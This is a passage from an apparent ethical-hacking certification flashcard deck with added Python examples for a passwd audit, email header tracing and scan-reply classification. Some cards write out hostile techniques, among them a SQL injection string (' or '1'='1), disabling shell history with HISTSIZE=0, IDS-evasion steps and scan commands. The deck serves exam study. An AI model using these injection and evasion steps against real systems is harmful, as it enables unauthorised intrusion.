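def extra_uid0_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Every account with UID 0 that is not 'root': each one is root by another name."""
    return [e.name for e in entries if e.uid == 0 and e.name != "root"]


NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def interactive_system_accounts(entries: List[PasswdEntry], uid_min: int = 1000) -> List[str]:
    """System accounts (0 < UID < uid_min) that still have a login shell.
    The 1000 cutoff follows common Linux defaults; it is an assumption."""
    return [e.name for e in entries if 0 < e.uid < uid_min and e.shell not in NOLOGIN_SHELLS]


# Constructed sample: a normal-looking file with one planted UID-0 account.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/sh
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE)
    print("alice:", ids_for(entries, "alice"))
    print("extra UID 0:", extra_uid0_accounts(entries))
    print("system accounts with a shell:", interactive_system_accounts(entries))
```

On a live system read the file with `open("/etc/passwd").read()`; it is world-readable, which is exactly why the hashes moved to /etc/shadow.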
Scanning Methodology
Check for Live Systems Check for Open Ports Scanning Beyond IDS Banner Grabbing Scan for Vulnerability Draw Network Diagrams Prepare Proxies Scanning Pen Testing
provide compatibility
Windows Application Compatibility Framework, shim is used to ___ between the older and newer versions of Windows operating system
B)Receive incoming syslog messages
Recently, you decided to open UDP port 514 on your company's firewall. What is the purpose of this action? A)Receive network time protocol messages B)Receive incoming syslog messages C)Allow users to access computers using rlogin D)Receive SNMP packets
TCP/UDP 162
SNMP Trap
Telnet request to port 25
What would the below output represent? 220 mailserver.domain.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 29 Jan 2011 11:29:14 +0200
D) Sigverif
Which built in Windows tool can be used to check the integrity of digitally signed critical files from Microsoft? A) Sc B) Netstat C) Msconfig D) Sigverif
D. Single Quote
Which character is the best choice to start a SQL injection attempt? A. Colon B. Semicolon C. Double Quote D. Single Quote
C)Preventative
Which class of control is smart card authentication? A)Prescriptive B)Corrective C)Preventative D)Detective
SSL
Which common web transport protocol can be used to evade an IDS and tunnel malicious content?
D)Switches
Which device is susceptible to MAC flood attacks? A)Hubs B)Routers C)Firewalls D)Switches
B)GLBA
Which of the following addresses the collection and disclosure of customers' personal financial information by financial institutions? A)HIPAA B)GLBA C)SOX D)FISMA
C) PKI
Which of the following are NOT components of a Kerberos system? A) KDC B) AD C) PKI D) TGS E) TGT
Meltdown Vulnerability
-Attackers may take advantage of this vulnerability to escalate privileges by forcing an unprivileged process to read adjacent memory it should not be able to access, such as kernel memory and physical memory -This reveals critical system information such as credentials, private keys, etc.
Spectre Vulnerability
-Attackers may take advantage of this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized -Using this vulnerability an attacker can even read the kernel memory or perform a web based attack using JavaScript
LOCAL_SYSTEM
Which Windows security context is a hacker operating from if the hacker can spawn a shell after a successful buffer overflow attack?
A)Iris
Which biometric scan focuses on the colored portion of the user's eye? A)Iris B)Retina C)Facial recognition D)Corneal
promiscuous mode
A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it -- a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap (or its successor Npcap) for this; Linux uses libpcap.
ICMP Type 4
A congestion control message.
C) 128
A Windows Server 2000 machine uses Syskey as an additional security step in regard to password protection. How many bits does Syskey use for encryption? A) 40 B) 64 C) 128 D) 256
promiscuous
A ___ policy is basically wide open.
Paranoid
A ___ policy locks everything down, not even allowing the user to open so much as an Internet browser.
Prudent
A ___ policy provides maximum security but allows some potentially or known dangerous services because of business needs.
Authentication header (AH)
An Internet Protocol Security (IPSec) header to verify that the contents of a packet have not been modified while the packet was in transit.
brute-force password attack
A method of password cracking whereby all possible options are systematically enumerated until a match is found. These attacks try every password (or authentication option), one after another, until successful.
Intranet Zone
A controlled zone that has little-to-no heavy restrictions.
B)set type=mx
A hacker is using nslookup in interactive mode to query Domain Name Service (DNS). The hacker specifically wants to discover the mail server records for your network. What should the hacker type into the command shell to request the appropriate records? A)locate type=ns B)set type=mx C)locate type=mx D)set type=ns
D)Hacktivist
A hacker was recently caught trying to deface the web site of a company with which he had serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called? A)Ethical hacker B)White hat C)Cracker D)Hacktivist
Biometrics
A measurable, physical characteristic used to recognize the identity, or verify the claimed identity, of an applicant.
Production Network Zone (PNZ)
A very restricted zone that strictly controls direct access from uncontrolled zones.
TCP
A SYN attack uses which protocol?
Challenge Handshake Authentication Protocol (CHAP)
An authentication method on point-to-point links, using a three-way handshake and a mutually agreed-upon key.
certificate
An electronic file used to verify a user's identity, providing nonrepudiation throughout the system. It is also a set of data that uniquely identifies an entity. It contains the entity's public key, serial number, version, subject, algorithm type, issuer, validity dates, and key usage details.
Burp Suite Firebug Website Informer
Analyzing a website from afar can show information such as software in use, OS, filenames, paths, and contact details, what tools can you use to gather this information?
B)getElementsByTagName() C)getElementById()
Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.) A)adoptNode() B)getElementsByTagName() C)getElementById() D)importNode() E)open() F)renameNode() G)write()
B)IDS
As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques: Break the network scans up into smaller ranges, with delays in between each scan. Break up IP packets into fragments. Which type of device are you most likely attempting to evade? A)Firewall B)IDS C)Router D)NAC
document all the findings
At the end of pen testing ______.
permission
Ethical hackers perform security assessments of their organization with the _____ of the concerned authorities
-U
hping option that sets the URG flag
hides the messages in ASCII text
In white space steganography, user ___ by adding white spaces to the end of the lines
Proxy Switcher
What tool hides your IP address from the websites you visit?
TCPTROJAN
Which of the following is not a trojan? A) BO2K B) LOKI C) Subseven D) TCPTROJAN
ALE
___ is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).
network activity
Necurs monitors and filters ___ and has been observed to send spam and install rogue security software
<1D> GROUP
NetBIOS code and type for Master browser for the subnet.
<20> UNIQUE
NetBIOS code and type for Server service running
<03> UNIQUE
NetBIOS code and type for the Messenger service running on the system.
HTTPS (TCP)
Port number 443
SMB (TCP)
Port number 445
Syslog
Port number 514
DNS (TCP, UDP)
Port number 53
Internet Printing Protocol
Port number 631
DHCP (UDP)
Port number 67
"export HISTSIZE=0"
Attackers can use the ___ command to disable command history, so the commands they used to hide files and log entries are never recorded in the history file
bypass firewall rules and logging mechanisms
Attackers use stealth scanning techniques to ___ and to disguise their probes as normal network traffic
social engineering
Attackers use this metadata and hidden information to perform ___ and other attacks
ICMP echo and ICMP reply
Attackers use the ICMP tunneling technique to use ____ packets as a carrier for a TCP payload, to access or control a system stealthily
live hosts on the network, services, type of packet filters/firewalls, operating systems, OS versions
Attackers use Nmap to extract information such as ___, ___ (application name and version), ___, ___ and ___
privileged user accounts
Attackers using these exploits can access ___ and credentials
application-level attacks
Attacks on the actual programming code of an application.
Shrink-wrap code attacks
Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.
something you know (user ID and password) something you have (smart card or token) something you are (biometrics)
Authentication measures are categorized by ___, ___, ___.
This flag signifies an ordered close to communications.
FIN (Finish)
Port is open (Xmas scan)
FIN + URG + PUSH --> <-- No Response
Port is closed (Xmas scan)
FIN + URG + PUSH --> <-- RST
TCP Session Termination
FIN --> <-- ACK <-- FIN ACK -->
RFC 793-based
FIN scan works only with OSes with __ TCP/IP implementation
Layer 7 Application
FTP, HTTP, SMTP, Etc resides at what layer of the OSI model?
appending a dot (.)
Files in UNIX can be hidden just by ___ in front of a file name
- Search for the target company's external URL in a search engine - Sub-domains provide insight into the different departments and business units of an organization - You may find a company's sub-domains by trial and error or by using a service such as Netcraft - You can use the Sublist3r Python script, which enumerates subdomains across multiple sources at once
Finding Company's Top-level Domains (TLDs) and Sub-domains
Know Security Posture
Footprinting allows attackers to know the external security posture of the target organization
as the process of gathering information on computer systems and networks.
Footprinting is defined as:
first step, publicly available sensitive information
Footprinting is the ____ of any attack on information systems; attackers gather _____, which they then use for social engineering, system and network attacks, etc., leading to financial loss and damage to business reputation
- Prevent DNS record retrieval from publicly available servers - Prevent information leakage - Prevent social engineering attempts
Footprinting pen testing helps an organization to:
D. EAL (Evaluation Assurance Level)
Four terms make up the Common Criteria process. Which of the following contains seven levels used to rate the target? A. ToE B. ST C. PP D. EAL
Using Reverse HTTP Shells Using Reverse ICMP Tunnels Using DNS Tunneling Using TCP Parameters
Four ways of covering tracks on a network
competitive intelligence
Freely and readily available information on an organization that can be gathered by a business entity about its competitor's customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.
C. 217.88.53.154
From the partial e-mail header provided, which of the following represents the true originator of the e-mail message? Return-path: <[email protected]> Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200 Received: from mailexchanger.anotherbiz.com([220.15.10.254]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200 Received: from mailserver.anybiz.com ([158.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200 Received: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from <[email protected]) id xxxxx-xxxxxx-xxxx for [email protected]; Tue, 12 Apr 2011 20:36:08 -0100 Message-ID: <[email protected]> Date: Tue, 12 Apr 2011 20:36:01 -0100 X-Mailer: Mail Client From: SOMEONE Name<[email protected]> To: USERJOE Name<[email protected]> Subject: Something to consider ... A. 220.15.10.254 B. 158.190.50.254 C. 217.88.53.154 D. The e-mail header does not show this information
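As an added example (not part of the deck), the header walk behind this question done in code: every MTA prepends its own Received: line, so the bottom-most one is the first hop and its bracketed address is what the receiving server actually saw on the wire. The sample message is constructed for the example; it keeps the card's hop layout and IP addresses but uses placeholder mailbox names and .test domains.

```python
# Added example (not from the original deck): walking the Received: chain to
# find where a message entered the mail system. Each MTA prepends its own
# Received header, so the bottom-most one is the first hop and the top-most
# the last. The sample message is constructed for the example.
import re
from email import message_from_string
from typing import Dict, List, Optional

# 'from <name> ... [<ip>] ... by <host>'. The bracketed address is what the
# receiving MTA saw on the wire; the name before it is whatever the sender
# claimed in HELO, so it cannot be trusted on its own.
HOP = re.compile(
    r"from\s+(?P<claimed>[^\s(\[]+).*?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\].*?\bby\s+(?P<by>\S+)",
    re.DOTALL)


def hops(raw_message: str) -> List[Dict[str, str]]:
    """Received hops in chronological order (first hop first). The email
    parser keeps folded continuation lines inside each header value."""
    msg = message_from_string(raw_message)
    result = []
    for header in reversed(msg.get_all("Received") or []):
        m = HOP.search(header)
        if m:
            result.append({"claimed": m.group("claimed"),
                           "ip": m.group("ip"), "by": m.group("by")})
    return result


def originator(raw_message: str) -> Optional[str]:
    """IP address the first relay saw the message come from. Headers below
    the first hop you control can be forged by the sender; the ones added
    by your own servers cannot."""
    chain = hops(raw_message)
    return chain[0]["ip"] if chain else None


SAMPLE = """\
Return-path: <someone@anybiz.test>
Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200
Received: from mailexchanger.anotherbiz.test ([220.15.10.254])
\tby mailserver.anotherbiz.test running ExIM with esmtp
\tid xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200
Received: from mailserver.anybiz.test ([158.190.50.254] helo=mailserver.anybiz.test)
\tby mailexchanger.anotherbiz.test with esmtp id xxxxxx-xxxxxx-xx
\tfor userjoe@anotherbiz.test; Wed, 13 Apr 2011 01:39:23 +0200
Received: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer])
\tby mailserver.anybiz.test with esmtpa (Exim x.xx)
\t(envelope-from <someone@anybiz.test>) id xxxxx-xxxxxx-xxxx
\tfor userjoe@anotherbiz.test; Tue, 12 Apr 2011 20:36:08 -0100
Message-ID: <xxxxxx@anybiz.test>
From: SOMEONE Name <someone@anybiz.test>
To: USERJOE Name <userjoe@anotherbiz.test>
Subject: Something to consider

body
"""

if __name__ == "__main__":
    for i, hop in enumerate(hops(SAMPLE), 1):
        print(i, hop)
    print("originator:", originator(SAMPLE))
```

The chain reads 217.88.53.154 (the sender's machine, authenticated via esmtpa) to mailserver.anybiz.test, then to mailexchanger.anotherbiz.test, then to the recipient's server. Anything the sender's own MTA wrote, including that first hop, is only as trustworthy as that MTA; start trusting at the first server you administer.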
B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received
Frustrated by the inability to sniff traffic on a switch, an attacker sends thousands of ARP messages through the switch. What is the attacker trying to accomplish? A) The MAC address pairings on the computer will become confused B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received C) The CAM table will set up false MAC address to port matches, resulting in mis-delivery of packets D) The CAM table will overflow, forcing the switch to reboot
www.alexa.com
company's online reputation (as well as the company's efforts to control it) and the actual traffic statistics of the company's web traffic can be found where?
Teardrop
custom fragmented packets
Sarbanes-Oxley (SOX)
was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior.
execute malicious programs
Attackers can use this technique to ___ at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
network topology trusted routers firewall locations
Attackers conduct traceroute to extract information about: _______
inject malicious script
Attackers create web shells to ___ on a web server to maintain persistent access and escalate privileges
Shrink Wrap Code Attacks
Attackers exploit default configuration and settings of the off-the-shelf libraries and code
steal critical system information such as credentials, secret keys
Attackers exploit these vulnerabilities to gain unauthorized access and ___, etc. stored in the application's memory to escalate privileges
SecurityFocus Exploit Database
Attackers search for an exploit based on the OS and software application on exploit sites such as ___, ___
gain access to a system
Attackers search for vulnerabilities in an operating system's design, installation or configuration and exploit them to ______
TCP probe packets with ACK flag
Attackers send ___ set to a remote device and then analyze the header information (TTL and WINDOW fields) of the received RST packets to find whether the port is open or closed
TCP probe packets
Attackers send ___ with a TCP flag (FIN, URG, PSH) set or with no flags; no response means the port is open (Nmap reports it as open|filtered, because a firewall silently dropping the probe looks identical), and a RST means the port is closed
Netcat (Banner Grabbing)
This utility reads and writes data across network connections, using the TCP/IP protocol
Launchd
___ is used in MacOS and OS X boot up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon
D) Hacktivism
_____ occurs when a hacker performs attacks because of political motivation A) Black hat hacking B) Gray box attacks C) Black box attacks D) Hacktivism
Banner Grabbing
_____ or OS fingerprinting is the method to determine the operating system running on a remote target system.
port is filtered port is not filtered
Attackers send an ACK probe packet with a random sequence number; no response means the ___ (a stateful firewall is present) and a RST response means the ___
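As an added example (not part of the deck), both sides of the probe exchanges on the cards above: `target_reply` models how a host answers a SYN, ACK, window, FIN, NULL or Xmas probe against an open, closed or firewalled port, and `classify` is the scanner-side decision in the states Nmap reports (open, closed, filtered, unfiltered, open|filtered). The `rfc793=False` host models stacks such as Windows that answer FIN/NULL/Xmas probes with RST regardless of port state, which is why those scans misreport open ports as closed there. The replies and window values are constructed for the example.

```python
# Added example (not from the original deck): both sides of the probe exchanges
# on these cards. `target_reply` models how a host answers a probe against an
# open, closed or filtered port; `classify` is the scanner-side decision,
# following the states Nmap reports.
from dataclasses import dataclass
from enum import Enum
from typing import FrozenSet, Optional, Tuple


class Scan(Enum):
    SYN = "syn"        # -sS: SYN, expect SYN/ACK (open) or RST (closed)
    ACK = "ack"        # -sA / hping3 -A: ACK, RST means unfiltered
    WINDOW = "window"  # -sW: ACK, RST window size distinguishes open/closed
    FIN = "fin"        # -sF
    NULL = "null"      # -sN
    XMAS = "xmas"      # -sX: FIN+PSH+URG


@dataclass(frozen=True)
class Reply:
    kind: str                                   # "tcp" or "icmp"
    flags: FrozenSet[str] = frozenset()         # TCP flags on the reply
    window: int = 0                             # TCP window on the reply
    icmp: Tuple[int, int] = (0, 0)              # (type, code) for ICMP replies


# ICMP unreachable messages Nmap treats as evidence of filtering.
ICMP_FILTERED = {(3, 1), (3, 2), (3, 3), (3, 9), (3, 10), (3, 13)}
RST = frozenset({"RST", "ACK"})
SYN_ACK = frozenset({"SYN", "ACK"})


def target_reply(state: str, scan: Scan, rfc793: bool = True) -> Optional[Reply]:
    """What the probed host sends back. state: 'open', 'closed' or 'filtered'
    (filtered = a stateful firewall silently drops the probe).
    rfc793=False models stacks (Windows, various Cisco devices) that answer
    FIN/NULL/Xmas probes with RST whether the port is open or not."""
    if state == "filtered":
        return None
    if scan is Scan.SYN:
        return Reply("tcp", SYN_ACK, window=29200) if state == "open" else Reply("tcp", RST)
    if scan in (Scan.ACK, Scan.WINDOW):
        # An unfirewalled port answers an unsolicited ACK with RST either way;
        # some stacks put a non-zero window on the RST only when listening.
        return Reply("tcp", RST, window=29200 if state == "open" else 0)
    # FIN / NULL / Xmas
    if state == "closed" or not rfc793:
        return Reply("tcp", RST)
    return None  # RFC 793: an open port silently drops the probe


def classify(scan: Scan, reply: Optional[Reply]) -> str:
    """Scanner-side interpretation, in Nmap's vocabulary."""
    if reply is None:
        return "filtered" if scan in (Scan.SYN, Scan.ACK, Scan.WINDOW) else "open|filtered"
    if reply.kind == "icmp":
        return "filtered" if reply.icmp in ICMP_FILTERED else "unknown"
    if scan is Scan.SYN:
        if SYN_ACK <= reply.flags:
            return "open"
        if "RST" in reply.flags:
            return "closed"
    elif scan is Scan.ACK:
        if "RST" in reply.flags:
            return "unfiltered"
    elif scan is Scan.WINDOW:
        if "RST" in reply.flags:
            return "open" if reply.window > 0 else "closed"
    else:  # FIN, NULL, Xmas
        if "RST" in reply.flags:
            return "closed"
    return "unknown"


def probe(state: str, scan: Scan, rfc793: bool = True) -> str:
    """One full exchange: send the probe, interpret whatever comes back."""
    return classify(scan, target_reply(state, scan, rfc793))


if __name__ == "__main__":
    for scan in Scan:
        print(scan.name, [probe(s, scan) for s in ("open", "closed", "filtered")],
              "windows-open:", probe("open", scan, rfc793=False))
```

Two things the table view hides: an ACK scan never says "open", only whether a stateful filter sits in the path, and the silence that means "open" for a FIN/NULL/Xmas probe is indistinguishable from a firewall drop, which is why Nmap prints open|filtered rather than open.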
inventory of live systems
Attackers then use ping sweep to create an ____ in the subnet
Port Scanning Countermeasures
1) Configure firewall and IDS to detect and block probes 2) Run the port scanning tools against hosts on the network to determine whether the firewall properly detects the port scanning activity 3) Ensure that the mechanisms used for routing and filtering at the routers and firewalls respectively cannot be bypassed using particular source ports or source-routing methods 4) Ensure that the router, IDS, and firewall firmware are updated to their latest releases 5) Use a custom rule set to lock down the network and block unwanted ports at the firewall 6) Filter all ICMP messages (i.e. inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers 7) Perform TCP and UDP scanning along with ICMP probes against your organization's IP address space to check the network configuration and its available ports 8) Ensure that anti-scanning and anti-spoofing rules are configured
Banner Grabbing Countermeasures: Disabling or Changing Banner
1) Display false banners to misguide attackers 2) Turn off unnecessary services on the network host to limit the information disclosure 3) Use tools such as ServerMask (http://www.port80software.com) to disable or change banner information 4) Apache 2.x with the mod_headers module - use a directive in the httpd.conf file to change banner information: Header set Server "New Server Name" 5) Alternatively, set ServerSignature Off in httpd.conf (and ServerTokens Prod, which trims the Server header to the bare product name)
Banner Grabbing Countermeasures: Hiding File Extensions from Web Pages
1) File extensions reveal information about the underlying server technology that an attacker can utilize to launch attacks 2) Hide file extensions to mask the web technology 3) Change application mappings such as .asp with .htm or .foo, etc. to disguise the identity of the servers 4) Apache users can use mod_negotiation directives 5) IIS users use tools such as PageXchanger to manage the file extensions
IP Identification Number
1) Send probe to host of suspect spoofed traffic that triggers reply and compare IP ID with suspect traffic 2) If IP IDs are not in the near value of packet being checked, suspect traffic is spoofed 3) This technique is successful even if the attacker is in the same subnet
IDS Evasion Techniques
1) Use fragmented IP packets 2) Spoof your IP address when launching attacks and sniff responses from server 3) Use source routing (if possible) 4) Connect to proxy servers or compromised trojaned machines to launch attacks
Proxy Chaining
1) User requests a resource from the destination 2) Proxy client at the user's system connects to a proxy server and passes the request to the proxy server 3) The proxy server strips the user's identification information and passes the request to the next proxy server 4) This process is repeated by all the proxy servers in the chain 5) At the end, the unencrypted request is passed to the web server
Access control list (ACL)
A method of defining what rights and permissions an entity has to a given resource.
penetration testing
A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.
daisy chaining
A method of external testing whereby several systems or resources are used together to make an attack.
CNAME record
A Canonical Name record within DNS, used to provide an alias for a domain name.
A. Scanning
A Certified Ethical Hacker (CEH) follows a specific methodology for testing a system. Which step comes after footprinting in the CEH methodology? A. Scanning B. Enumeration C. Reconnaissance D. Application attack
acknowledgment (ACK)
A TCP flag notifying an originating station that the preceding packet (or packets) has been received
Permissive
A ___ policy blocks only things that are known to be naughty or dangerous.
reverse DNS resolution
A ____ is carried out to identify the host names when doing a List Scan
daemon
A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.
cold site
A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.
cloning
A cell phone attack in which the serial number from one cell phone is copied to another so that the second phone impersonates the first.
A) Anomaly based
A client asks you about intrusion detection systems. They want a system that dynamically learns traffic patterns and alerts on abnormal traffic. Which IDS would you recommend? A) Anomaly based B) Pattern based C) Signature based D) None of the above
D. Configure server side input validation on all web forms
A client is concerned about web server security. In addition to taking steps against buffer overflows on several web applications, the client wants to mitigate against cross site scripting from the web front ends. Which of the following would be the best choice to assist in this? A. Perform a vulnerability scan using NESSUS B. Perform a penetration test like scan against the server using Metasploit C. Ensure only the Apache web server is in use D. Configure server side input validation on all web forms
A. Buffer Overflow
A client's web application appears to have an excessive number of GETS. Which attack is this software potentially susceptible to? A. Buffer Overflow B. Brute Force C. SQL Injection D. Parameter Tampering
community cloud
A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
ad hoc mode
A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.
B. An ACK scan using hping3 on port 80 for a group of addresses
A colleague enters the following command: root@mybox: # hping3 -A 192.168.2.x -p 80 What is being attempted here? A. An ACK scan using hping3 on port 80 for a single address B. An ACK scan using hping3 on port 80 for a group of addresses C. Address validation using hping3 on port 80 for a single address D. Address validation using hping3 on port 80 for a group of addresses
D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.
A colleague enters the following into a Google search string: intitle:intranet inurl:intranet:+intext:"human resources" Which of the following is most correct concerning this attempt? A. The search engine will not respond with any result because you cannot combine Google hacks in one line. B. The search engine will respond with all pages having the word intranet in their title and human resources in the URL. C. The search engine will respond with all pages having the word intranet in the title and in the URL. D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.
archive
A collection of historical records or the place where they are kept. In computing, an ___ generally refers to backup copies of logs and/or data.
Telnet for banner grabbing
A common method of performing banner grabbing is to use a simple tool already built into most operating systems, ____.
B. Ensuring there are no A records for internal hosts on the public-facing name server
A company has a publicly facing web application. Its internal intranet-facing servers are separated and protected by a firewall. Which of the following choices would be helpful in protecting against unwanted enumeration? A. Allowing zone transfers to ANY B. Ensuring there are no A records for internal hosts on the public-facing name server C. Changing the preference number on all MX records to zero D. Not allowing any DNS query to the public-facing name server
C)DNS zone transfer enumeration
A company hosts a public web application and an internal Intranet protected by a firewall. All DNS queries go through a single DNS server. Due to security concerns, your company deployed a second internal DNS server. You remove all the internal A resource records from the old DNS server and configure it to only communicate with external entities using an external DNS zone. The new internal DNS server contains only the internal zone with internal resource records. What should this countermeasure protect against? A)DNS hijacking B)DNS cache poisoning C)DNS zone transfer enumeration D)DoS attacks
crossover error rate (CER)
A comparison metric for different biometric devices and technologies; the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As an identification device becomes more sensitive or accurate, its FAR decreases while its FRR increases. It is the point at which these two rates are equal, or cross over.
buffer overflow
A condition that occurs when more data is written to a buffer than it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.
A)Social engineering
A customer receives an unsolicited call from a known software company. The person on the other end requires the customer to verify their user credentials over the phone. Which term describes this type of hacking? A)Social engineering B)Tailgating C)Soft skills D)Gumshoeing
cracker
A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.
D)Maps out the tables within the database is trying to exploit
A database administrator contacts you regarding the database he administers. He is concerned that an attacker is using database fingerprinting. What does this do? A)Attempts to run SQL statements B)Causes the SQL database to shut down C)Provides information about the server on which the database resides D)Maps out the tables within the database is trying to exploit
Script kiddie
A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.
Anonymizer
A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.
Suicide hacker
A hacker who aims to bring down critical infrastructure for a "cause" and does not worry about the penalties associated with his actions.
Backdoor
A hidden capability in a system or program for bypassing normal computer authentication systems.
Time and date Actions Events
A logic bomb is activated by which of the following? A) Time and date B) Vulnerability C) Actions D) Events
B. An external threat can take advantage of the misconfigured X-server vulnerability. D. An internal threat can take advantage of the misconfigured X-server vulnerability
A machine in your environment uses an open X-server to allow remote access. The X-server access control is disabled, allowing connections from almost anywhere and with little to no authentication measures. Which of the following are true statements regarding this situation? (Choose all that apply.) A. An external vulnerability can take advantage of the misconfigured X-server threat. B. An external threat can take advantage of the misconfigured X-server vulnerability. C. An internal vulnerability can take advantage of the misconfigured X-server threat. D. An internal threat can take advantage of the misconfigured X-server vulnerability
unsolicited SYN/ACK
A machine that receives an ___ packet will respond with an RST. An unsolicited RST will be ignored.
Mandatory access control (MAC)
A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.
Annualized loss expectancy (ALE)
A measurement of the cost of an asset's value to the organization and the monetary loss that can be expected for an asset due to risk over a one-year period.
B. False negatives
A network and security administrator installs an NIDS. After a few weeks, a successful intrusion into the network occurs and a check of the NIDS during the timeframe of the attack shows no alerts. An investigation shows the NIDS was not configured correctly and therefore did not trigger on what should have been attack alert signatures. Which of the following best describes the actions of the NIDS? A. False positives B. False negatives C. True positives D. True negatives
D) Python
A new network administrator is asked to schedule daily scans of systems throughout the enterprise. Which of the following programming languages has an OSI-approved open source license and is commonly used for accomplishing this goal? A) ASP.NET B) PHP C) C# D) Python
B) The team is practicing passive footprinting D) The team is gathering competitive intelligence
A pen test team starts a particular effort by visiting the company's website; a team member goes to social networking sites and job boards looking for information and building a profile on the organization. Which of the following statements are true regarding these efforts? (Choose two) A) The team is practicing active footprinting B) The team is practicing passive footprinting C) The team is gathering sensitive information that should be protected D) The team is gathering competitive intelligence
D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account
A penetration test team member is running user2sid commands on a machine. After entering the command user2sid \\218.55.62.3 guest, she receives an output of S-1-5-21-861567501-1383384898-839522115-501. Which of the following is true regarding this output? A) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-501 will return the name of the true administrator account B) Running the command sid2user S-1-5-21-861567500-1383384898-839522115-501 will return the name of the true administrator account C) Running the command sid2user S-1-5-21-861567501-1383384898-500-501 will return the name of the true administrator account D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account
A. The background web application used the first record it could find in the table
A penetration tester finds a web application offering an error message with an entry area for an e-mail account. The penetration tester enters ' or '1'='1 into the field and presses <ENTER>. A message appears stating "Your login information has been mailed to [email protected]." What is the likely reason for this? A. The background web application used the first record it could find in the table B. The background web application used a random record from the table C. The background web application has crashed D. The background web application is now stuck in a loop
D) Cain
A penetration tester has gained access to a .pcf file. Which of the following tools could be useful in decoding passwords embedded in the file? A) Nessus B) Nmap C) John the Ripper D) Cain
A. Create a route statement within the meterpreter
A penetration tester is using Metasploit to attack an FTP server. He wants to use the FTP server as a launching point to "pivot" to an internal LAN segment. Which of the following should be accomplished to perform the attack? A. Create a route statement within the meterpreter B. Set payload action in the meterpreter to propagate C. Choose the pivot exploit D. Set network configuration parameters to reconfigure in the meterpreter
A)Data-mining techniques
A programmer from your company contacts you regarding a possible security breach. During the discussion, he asks you to identify and investigate unauthorized transactions. What should you use to provide him with this information? A)Data-mining techniques B)Reconnaissance C)Footprinting D)Banner grabbing
Bluetooth
A proprietary, open, wireless technology used for transferring data from fixed and mobile devices over short distances.
Address Resolution Protocol (ARP)
A protocol used to map a known IP address to a physical (MAC) address. It is defined in RFC 826.
URL imbedding
A public use workstation contains the browsing history of multiple users who logged in during the last seven days. While digging through the history, a user runs across the following web address: www.snaz33enu.com/&w25/session-22525
Audit trail
A record showing which user has accessed a given resource and what operations the user performed during a given period.
tailgating
A security camera picks up someone who doesn't work at the company following closely behind an employee while they enter the building. What type of attack is taking place?
It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.
A security engineer runs the following Nmap command: nmap -sn -PE 192.168.1-5 What are the results of this scan? A)It will scan the first five hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. B)It will scan all hosts on the 192.168.1.0 subnet. C)It will scan the first host on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. D)It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.
confidentiality
